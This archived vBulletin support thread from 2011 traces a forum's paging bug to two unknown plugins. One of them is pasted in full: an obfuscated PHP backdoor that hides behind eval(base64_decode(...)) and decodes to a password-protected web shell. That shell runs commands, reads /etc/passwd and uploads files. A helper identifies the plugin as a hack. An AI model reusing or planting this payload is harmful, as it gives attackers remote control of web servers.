vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 Programming Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=15)
-   -   Serious problem with vBulletin 3.8 (https://vborg.vbsupport.ru/showthread.php?t=270179)

mdrs2 09-13-2011 10:13 AM

Serious problem with vBulletin 3.8
 
Hi guys
My forum only shows the first page of all Threads. It happened suddenly. I've not installed any plugins recently.
when i disable all hooks, it gonna be ok !

Lynne 09-13-2011 03:46 PM

If you disable hooks and it is OK, then it is one of your modifications causing the issue. So, disable all Products except the vBulletin Blog and vBulletin CMS (Admin CP -> Plugins & Products -> Manage Products -> Disable) AND uncheck all the plugins except those related to the vBulletin Blog and vBulletin CMS by (Admin CP -> Plugins & Products -> Plugin Manager). You must do BOTH of those steps in order to disable all non vBulletin Modifications. Now turn the modifications back on, one-by-one and see if the problem starts again.

mdrs2 09-13-2011 05:51 PM

i still have the problem
i've disabled all products, and unchecked all plugins but it didn't fix ! as soon as i disable those from (Vbulletin option => plugin/hook system) the problem will be solved, but if i disable those manually i still have the problem !

Lynne 09-14-2011 01:39 AM

If it works when you do it via the Options, then you did not completely disable them all via BOTH the Plugin Manager AND the Manage Products page.

mdrs2 09-14-2011 07:43 AM

Thanks Lynne ;)
Finally i found the corrupted plugin !
Can anyone tell me what is this plugin and what is it for ?
There is two similar plugins. i have to disable first one. if i enable first one and disable second one, I still have the problem ! can I delete it ?
My vB is 3.8.4
https://vborg.vbsupport.ru/external/2011/09/45.jpg

Lynne 09-14-2011 04:55 PM

I have no idea what they are, but they are not default vbulletin plugins. Are they exactly the same? What do they do? If you didn't install them, then you should remove them.

mdrs2 09-14-2011 10:43 PM

I don't know what do they do honestly ! Anyway i disabled both of them and nothing happened at all
the both have same content as i quote here
PHP Code:

if (strpos($_SERVER['PHP_SELF'],"subscriptions.php")) { 

eval(
base64_decode('c2Vzc2lvbl9zdGFydCgpOw0KDQplcnJvcl9yZXBvcnRpbmcoMCk7DQoNCg0KDQokdmVyc2lvbiA9ICIwLjdCIjsNCg0KJGZ1bmN0aW9ucyA9IGFycmF5KCdDbGVhciBTY3JlZW4nID0+ICdDbGVhclNjcmVlbigpJywNCidDbGVhciBIaXN0b3J5JyA9PiAnQ2xlYXJIaXN0b3J5KCknLA0KJ0NhbiBJIGZ1bmN0aW9uPycgPT4gInJ1bmNvbW1hbmQoJ2NhbmlydW4nLCdHRVQnKSIsDQonR2V0IHNlcnZlciBpbmZvJyA9PiAicnVuY29tbWFuZCgnc2hvd2luZm8nLCdHRVQnKSIsDQonUmVhZCAvZXRjL3Bhc3N3ZCcgPT4gInJ1bmNvbW1hbmQoJ2V0Y3Bhc3N3ZGZpbGUnLCdHRVQnKSIsDQonT3BlbiBwb3J0cycgPT4gInJ1bmNvbW1hbmQoJ25ldHN0YXQgLWFuIHwgZ3JlcCAtaSBsaXN0ZW4nLCdHRVQnKSIsDQonUnVubmluZyBwcm9jZXNzZXMnID0+ICJydW5jb21tYW5kKCdwcyAtYXV4JywnR0VUJykiLA0KJ1JlYWRtZScgPT4gInJ1bmNvbW1hbmQoJ3NoZWxsaGVscCcsJ0dFVCcpIg0KDQopOw0KJHRoaXNmaWxlID0gYmFzZW5hbWUoX19GSUxFX18pOw0KDQokc3R5bGUgPSAnPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCi5jbWR0aGluZyB7DQogICAgYm9yZGVyLXRvcC13aWR0aDogMHB4Ow0KICAgIGZvbnQtd2VpZ2h0OiBibUxIVFRQIik7DQogICAgICAgICAgICB9IGNhdGNoIChlKXsNCiAgICAgICAgICAgICAgICBhbGVydCgiV2lja2VkIGVycm9yLCBub3RoaW5nIHdlIGNhbiBkbyBhYm91dCBpdC4uLiIpOw0KICAgICAgICAgICAgICAgIHJldHVybiBmYWxzZTsNCiAgICAgICAgICAgIH0NCiAgICAgICAgfQ0KICAgIH0NCiAgICBhamF4UmVxdWVzdC5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpew0KICAgICAgICBpZihhamF4UmVxdWVzdC5yZWFkeVN0YXRlID09IDQpew0KICAgICAgICBvdXRwdXRjbWQgPSAiPHByZT4iICArIG91dHB1dGNtZCArIGFqYXhSZXF1ZXN0LnJlc3BvbnNlVGV4dCArIjwvcHJlPiI7DQogICAgICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnb3V0cHV0JykuaW5uZXJIVE1MID0gb3V0cHV0Y21kOw0KICAgICAgICAgICAgdmFyIG9iakRpdiA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJvdXRwdXQiKTsNCgkJCW9iakRpdi5zY3JvbGxUb3AgPSBvYmpEaXYuc2Nyb2xsSGVpZ2h0Ow0KICAgICAgICB9DQogICAgfQ0KICAgIGFqYXhSZXF1ZXN0Lm9wZW4oYWN0aW9uLCAiP3J1bmNtZD0iK3VybHRvb3BlbiAsIHRydWUpOw0KCWlmKGFjdGlvbiA9PSAiR0VUIikNCgl7DQogICAgYWpheFJlcXVlc3Quc2VuZChudWxsKTsNCgl9DQogICAgZG9jdW1lbnQuY21kZm9ybS5jb21tYW5kLnZhbHVlPScnOw0KICAgIHJldHVybiBmYWxzZTsNCn0NCg0KZnVuY3Rpb24gc2V0X3RhYl9odG1sKG5ld2h0bWwpDQp7DQpkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnY29tbWFuZHRhYicpLmlubmVySFRNTCA9IG5ld2h0bWw7DQp9DQoNCmZ1bmN0aW9uIHNldF90YWIobmV3dGFiKQ0Kew0KCWlmKG5ld3RhYiA9PSAiY21kIikNCgl7DQoJCW5ld2h0bWwgPSAnJm5ic3A7Jm5ic3A7Jm5ic3A7PGZvcm0gbmFtZT0iY21kZm9ybSIgb25zdWJtaXQ9InJldHVybiBydW5jb21tYW5kKGRvY3VtZW50LmNtZGZvcm0uY29tbWFuZC52YWx1ZSxcJ0dFVFwnKTsiPjxiPkNvbW1hbmQ8L2I+OiA8aW5wdXQgdHlwZT10ZXh0IG5hbWU9Y29tbWFuZCBjbGFzcz1jbWR0aGluZyBzaXplPTEwMCU+PGJyPjwvZm9ybT4nOw0KCX0NCgllbHNlIGlmKG5ld3RhYiA9PSAidXBsb2FkIikNCgl7DQoJCXJ1bmNvbW1hbmQoJ3VwbG9hZCcsJ0dFVCcpOw0KCQluZXdodG1sID0gJzxmb250IHNpemU9MD48Yj5UaGlzIHdpbGwgcmVsb2FkIHRoZSBwYWdlLi4uIDooPC9iPjxicj48YnI+PGZvcm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSI8P3BocCBwcmludCAkVGhpc0ZpbGU7ID8+IiBtZXRob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Ik1BWF9GSUxFX1NJWkUiIHZhbHVlPSIxMDAwMDAwMCIgLz5DaG9vc2UgYSBmaWxlIHRvIHVwbG9hZDogPGlucHV0IG5hbWU9InVwbG9hZGVkZmlsZSIgdHlwZT0iZmlsZSIgLz48YnIgLz48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iVXBsb2FkIEZpbGUiIC8+PC9mb3JtPjwvZm9udD4nOw0KCX0NCgllbHNlIGlmKG5ld3RhYiA9PSAid29ya2luZ2RpciIpDQoJew0KCQk8P3BocA0KCQkkZm9sZGVycyA9ICI8Zm9ybSBuYW1lPXdvcmtkaXIgb25zdWJtaXQ9XCJyZXR1cm4gcnVuY29tbWFuZChcJ2NoYW5nZXdvcmtkaXIgXCcgKyBkb2N1bWVudC53b3JrZGlyLmNoYW5nZXdvcmtkaXIudmFsdWUsXCdHRVRcJyk7XCI+PGlucHV0IHNpemU9ODAlIHR5cGU9dGV4dCBuYW1lPWNoYW5nZXdvcmtkaXIgdmFsdWU9XCIiOw0KCQkkcGF0aHBhcnRzID0gZXhwbG9kZSgiLyIscmVhbHBhdGggKCIuIikpOw0KCQlmb3JlYWNoKCRwYXRocGFydHMgYXMgJGZvbGRlcikNCgkJew0KCQkkZm9sZGVycyAuPSAkZm9sZGVyLiIvIjsNCgkJfQ0KCQkkZm9sZGVycyAuPSAiXCI+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPUNoYW5nZT48L2Zvcm0+PGJyPlNjcmlwdCBkaXJlY3Rvcnk6IDxpIHN0eWxlPVwiY3Vyc29yOmNyb3NzaGFpclwiICBvbmNsaWNrPVwiZG9jdW1lbnQud29ya2Rpci5jaGFuZ2V3b3JrZGlyLnZhbHVlPVwnIi5kaXJuYW1lKF9fRklMRV9fKS4iXCc+Ii5kaXJuYW1lKF9fRklMRV9fKS4iPC9pPiI7DQoNCgkJPz4NCgkJbmV3aHRtbCA9ICc8P3BocCBwcmludCAkZm9sZGVyczsgPz4nOw0KCX0NCgllbHNlIGlmKG5ld3RhYiA9PSAiZmlsZWJyb3dzZXIiKQ0KCXsNCgkJbmV3aHRtbCA9ICc8Yj5GaWxlIGJyb3dzZXIgaXMgdW5kZXIgY29uc3RydWN0aW9uISBVc2UgYXQgeW91ciBvd24gcmlzayE8L2I+IDxicj5Zb3UgY2FuIHVzZSBpdCB0byBjaGFuZ2UgeW91ciB3b3JraW5nIGRpcmVjdG9yeSBlYXNpbHksIGRvblwndCBleHBlY3QgdG9vIG11Y2ggb2YgaXQuPGJyPkNsaWNrIG9uIGEgZmlsZSB0byBlZGl0IGl0Ljxicj48aT5bV108L2k+ID0gc2V0IGRpcmVjdG9yeSBhcyB3b3JraW5nIGRpcmVjdG9yeS48YnI+PGk+W0RdPC9pPiA9IGRlbGV0ZSBmaWxlL2RpcmVjdG9yeSc7DQoJCXJ1bmNvbW1hbmQoJ2xpc3RkaXIgLicsJ0dFVCcpOw0KCX0NCgllbHNlIGlmKG5ld3RhYiA9PSAiY3JlYXRlZmlsZSIpDQoJew0KCQluZXdodG1sID0gJzxiPkZpbGUgRWRpdG9yLCB1bmRlciBjb25zdHJ1Y3Rpb24uPC9iPic7DQoJCWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdvdXRwdXQnKS5pbm5lckhUTUwgPSAiPGZvcm0gbmFtZT1cInNhdmVmb3JtXCI+PHRleHRhcmVhIGNvbHM9NzAgcm93cz0xMCBpZD1cImFyZWExXCI+PC90ZXh0YXJlYT48YnI+PGlucHV0IHNpemU9ODAgdHlwZT10ZXh0IG5hbWU9ZmlsZXRvc2F2ZSB2YWx1ZT1cIjw/cGhwIHByaW50IHJlYWxwYXRoKCcuJykuIi8iLnJhbmQoMTAwMCw5OTk5OTkpLiIudHh0IjsgPz5cIj48aW5wdXQgdmFsdWU9XCJTYXZlXCIgdHlwZT1idXR0b24gb25jbGljaz1cIlNhdmVGaWxlKCk7XCI+PC9mb3JtPiI7DQoJCQ0KCX0NCgkJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2NvbW1hbmR0YWInKS5pbm5lckhUTUwgPSBuZXdodG1sOw0KfQ0KPC9zY3JpcHQ+DQo8L2hlYWQ+DQo8Ym9keSBiZ2NvbG9yPWJsYWNrIG9ubG9hZD0ic2YoKTsiIHZsaW5rPXdoaXRlIGFsaW5rPXdoaXRlIGxpbms9d2hpdGU+DQo8dGFibGUgYm9yZGVyPTEgd2lkdGg9MTAwJSBoZWlnaHQ9MTAwJT4NCjx0ZCB3aWR0aD0xNSUgdmFsaWduPXRvcD4NCg0KPGZvcm0gbmFtZT0iZXh0cmFzIj48YnI+DQo8Y2VudGVyPjxiPlF1aWNrIENvbW1hbmRzPC9iPjxicj4NCg0KPGRpdiBzdHlsZT0nbWFyZ2luOiAwcHg7cGFkZGluZzogMHB4O2JvcmRlcjogMXB4IGluc2V0O292ZXJmbG93OiBhdXRvJz4NCjw/cGhwDQpmb3JlYWNoKCRmdW5jdGlvbnMgYXMgJG5hbWUgPT4gJGV4ZWN1dGUpDQp7DQpwcmludCAnJm5ic3A7PGlucHV0IHR5cGU9ImJ1dHRvbiIgdmFsdWU9IicuJG5hbWUuJyIgb25jbGljaz0iJy4kZXhlY3V0ZS4nIj48YnI+JzsNCn0NCj8+DQoNCjwvY2VudGVyPg0KDQo8L2Rpdj4NCjwvZm9ybT4NCjxjZW50ZXI+PGI+Q29tbWFuZCBoaXN0b3J5PC9iPjxicj48L2NlbnRlcj4NCjxkaXYgaWQ9Imhpc3RvcnkiIHN0eWxlPSdtYXJnaW46IDBweDtwYWRkaW5nOiAwcHg7Ym9yZGVyOiAxcHggaW5zZXQ7d2lkdGg6IDEwMCU7aGVpZ2h0OiAyMCU7dGV4dC1hbGlnbjogbGVmdDtvdmVyZmxvdzogYXV0bztmb250LXNpemU6IDEwcHg7Jz48L2Rpdj4NCjxicj4NCjxjZW50ZXI+PGI+QWJvdXQ8L2I+PGJyPjwvY2VudGVyPg0KPGRpdiBzdHlsZT0nbWFyZ2luOiAwcHg7cGFkZGluZzogMHB4O2JvcmRlcjogMXB4IGluc2V0O3dpZHRoOiAxMDAlO3RleHQtYWxpZ246IGNlbnRlcjtvdmVyZmxvdzogYXV0bzsgZm9udC1zaXplOiAxMHB4Oyc+DQo8YnI+DQo8Yj48Zm9udCBzaXplPTM+QWpheC9QSFAgQ29tbWFuZCBTaGVsbDwvYj48L2ZvbnQ+PGJyPmJ5IElyb25maXN0DQo8YnI+DQpWZXJzaW9uIDw/cGhwIHByaW50ICR2ZXJzaW9uOyA/Pg0KDQo8YnI+DQo8YnI+DQoNCjxicj5UaGFua3MgdG8gZXZlcnlvbmUgQCANCjxhIGhyZWY9Imh0dHA6Ly93d3cuaXJvbndhcmV6LmluZm8iIHRhcmdldD1fYmxhbms+U2hhcmVQbGF6YTwvYT4NCjxicj4NCjxhIGhyZWY9Imh0dHA6Ly93d3cubWlsdzBybS5jb20iIHRhcmdldD1fYmxhbms+bWlsdzBybTwvYT4NCjxicj4NCmFuZCBzcGVjaWFsIGdyZWV0aW5ncyB0byBldmVyeW9uZSBpbiByb290c2hlbGwNCjwvZGl2Pg0KDQo8L3RkPg0KPHRkIHdpZHRoPTcwJT4NCjx0YWJsZSBib3JkZXI9MCB3aWR0aD0xMDAlIGhlaWdodD0xMDAlPjx0ZCBpZD0idGFicyIgaGVpZ2h0PTElPjxmb250IHNpemU9MD4NCjxiIHN0eWxlPSJjdXJzb3I6Y3Jvc3NoYWlyIiBvbmNsaWNrPSJzZXRfdGFiKCdjbWQnKTsiPltFeGVjdXRlIGNvbW1hbmRdPC9iPiANCjxiIHN0eWxlPSJjdXJzb3I6Y3Jvc3NoYWlyIiBvbmNsaWNrPSJzZXRfdGFiKCd1cGxvYWQnKTsiPltVcGxvYWQgZmlsZV08L2I+IA0KPGIgc3R5bGU9ImN1cnNvcjpjcm9zc2hhaXIiIG9uY2xpY2s9InNldF90YWIoJ3dvcmtpbmdkaXInKTsiPltDaGFuZ2UgZGlyZWN0b3J5XTwvYj4gDQo8YiBzdHlsZT0iY3Vyc29yOmNyb3NzaGFpciIgb25jbGljaz0ic2V0X3RhYignZmlsZWJyb3dzZXInKTsiPltGaWxlYnJvd3Nlcl08L2I+IA0KPGIgc3R5bGU9ImN1cnNvcjpjcm9zc2hhaXIiIG9uY2xpY2s9InNldF90YWIoJ2NyZWF0ZWZpbGUnKTsiPltDcmVhdGUgRmlsZV08L2I+IA0KDQo8L2ZvbnQ+PC90ZD4NCjx0cj4NCjx0ZCBoZWlnaHQ9OTklIHdpZHRoPTEwMCUgdmFsaWduPXRvcD48ZGl2IGlkPSJvdXRwdXQiIHN0eWxlPSdoZWlnaHQ6MTAwJTt3aGl0ZS1zcGFjZTpwcmU7b3ZlcmZsb3c6YXV0byc+PC9kaXY+DQoNCjx0cj4NCjx0ZCAgaGVpZ2h0PTElIHdpZHRoPTEwMCUgdmFsaWduPXRvcD4NCjxkaXYgaWQ9ImNvbW1hbmR0YWIiIHN0eWxlPSdoZWlnaHQ6MTAwJTt3aGl0ZS1zcGFjZTpwcmU7b3ZlcmZsb3c6YXV0byc+DQombmJzcDsmbmJzcDsmbmJzcDs8Zm9ybSBuYW1lPSJjbWRmb3JtIiBvbnN1Ym1pdD0icmV0dXJuIHJ1bmNvbW1hbmQoZG9jdW1lbnQuY21kZm9ybS5jb21tYW5kLnZhbHVlLCdHRVQnKTsiPg0KPGI+Q29tbWFuZDwvYj46IDxpbnB1dCB0eXBlPXRleHQgbmFtZT1jb21tYW5kIGNsYXNzPWNtZHRoaW5nIHNpemU9MTAwJT48YnI+DQo8L2Zvcm0+DQo8L2Rpdj4NCjwvdGQ+DQo8L3RhYmxlPg0KPC90ZD4NCjwvdGFibGU+DQo8L2JvZHk+DQo8L2h0bWw+DQo8P3BocA0KfQ0KfSBlbHNlIHsNCnByaW50ICI8Y2VudGVyPjx0YWJsZSBib3JkZXI9MCAgaGVpZ2h0PTEwMCU+DQo8dGQgdmFsaWduPW1pZGRsZT4NCjxmb3JtIGFjdGlvbj0iLmJhc2VuYW1lKF9fRklMRV9fKS4iIG1ldGhvZD1QT1NUPllvdSBhcmUgbm90IGxvZ2dlZCBpbiwgcGxlYXNlIGxvZ2luLjxicj48Yj5QYXNzd29yZDo8L2I+PGlucHV0IHR5cGU9cGFzc3dvcmQgbmFtZT1wNHNzdzByRD48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9XCJMb2cgaW5cIj4NCjwvZm9ybT4iOw0KfQ=='));

exit; 



Lynne 09-14-2011 11:01 PM

I hate to tell you, but you've most likely been hacked. base64 is never a good thing to see in any of your code. I would remove those and look at your access_logs to see how they did this. You may need to ask your host for help.

mdrs2 09-15-2011 09:32 PM

here is full of the code ;)
http://www.mediafire.com/?cscsok6c1mfz6b4

I'm waiting for your response.

Lynne 09-15-2011 10:26 PM

I'm not sure what response you want from me. You've been hacked. You need to talk to your host about how this happened and how to fix the issue.

You may google for a base64 converter to find out what that code does. Just to let you know, but this is in part of the comments:
Quote:

The shell can be used by anyone to command any server, .....


All times are GMT. The time now is 10:18 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01169 seconds
  • Memory Usage 1,772KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_php_printable
  • (1)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (10)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 

Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • pagenav_page
  • pagenav_complete
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete